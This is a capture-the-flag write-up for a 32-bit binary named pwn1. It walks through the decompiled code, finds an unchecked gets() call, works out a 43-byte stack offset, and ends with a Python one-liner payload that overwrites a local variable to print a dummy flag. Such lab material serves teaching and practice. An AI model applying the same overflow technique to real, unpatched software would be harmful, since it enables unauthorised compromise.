Pwn1
$ file pwn1 pwn1: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not stripped $ checksec.sh --file pwn1 RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Full RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH pwn1
int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [esp+1h] [ebp-3Bh] int v5; // [esp+2Ch] [ebp-10h] int v6; // [esp+30h] [ebp-Ch] int *v7; // [esp+34h] [ebp-8h] v7 = &argc; setvbuf(stdout, (char *)&dword_0 + 2, 0, 0); v6 = 2; v5 = 0; puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see."); puts("What... is your name?"); fgets(&s, 43, stdin); if ( strcmp(&s, "Sir Lancelot of Camelot\n") ) { puts("I don't know that! Auuuuuuuugh!"); exit(0); } puts("What... is your quest?"); fgets(&s, 43, stdin); if ( strcmp(&s, "To seek the Holy Grail.\n") ) { puts("I don't know that! Auuuuuuuugh!"); exit(0); } puts("What... is my secret?"); gets(&s); if ( v5 == 0xDEA110C8 ) print_flag(); else puts("I don't know that! Auuuuuuuugh!"); return 0; }
$ ./pwn1 Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. What... is your name? Sir Lancelot of Camelot What... is your quest? To seek the Holy Grail. What... is my secret? a I don't know that! Auuuuuuuugh!
stack
-0000003B s db ? -0000003A db ? ; undefined -00000039 db ? ; undefined -00000038 db ? ; undefined -00000037 db ? ; undefined -00000036 db ? ; undefined -00000035 db ? ; undefined -00000034 db ? ; undefined -00000033 db ? ; undefined -00000032 db ? ; undefined -00000031 db ? ; undefined -00000030 db ? ; undefined -0000002F db ? ; undefined -0000002E db ? ; undefined -0000002D db ? ; undefined -0000002C db ? ; undefined -0000002B db ? ; undefined -0000002A db ? ; undefined -00000029 db ? ; undefined -00000028 db ? ; undefined -00000027 db ? ; undefined -00000026 db ? ; undefined -00000025 db ? ; undefined -00000024 db ? ; undefined -00000023 db ? ; undefined -00000022 db ? ; undefined -00000021 db ? ; undefined -00000020 db ? ; undefined -0000001F db ? ; undefined -0000001E db ? ; undefined -0000001D db ? ; undefined -0000001C db ? ; undefined -0000001B db ? ; undefined -0000001A db ? ; undefined -00000019 db ? ; undefined -00000018 db ? ; undefined -00000017 db ? ; undefined -00000016 db ? ; undefined -00000015 db ? ; undefined -00000014 db ? ; undefined -00000013 db ? ; undefined -00000012 db ? ; undefined -00000011 db ? ; undefined -00000010 var_10 dd ?
0x3b - 0x10 = 43
$ python -c "print 'Sir Lancelot of Camelot\nTo seek the Holy Grail.\n' + 'A' * 43 + '\xc8\x10\xa1\xde'" | ./pwn1 Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. What... is your name? What... is your quest? What... is my secret? Right. Off you go. this is dummy flag $